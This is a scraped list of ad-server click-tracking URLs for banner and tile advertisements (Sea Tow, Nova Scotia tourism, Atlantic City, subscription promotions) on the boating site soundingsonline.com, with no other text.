http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
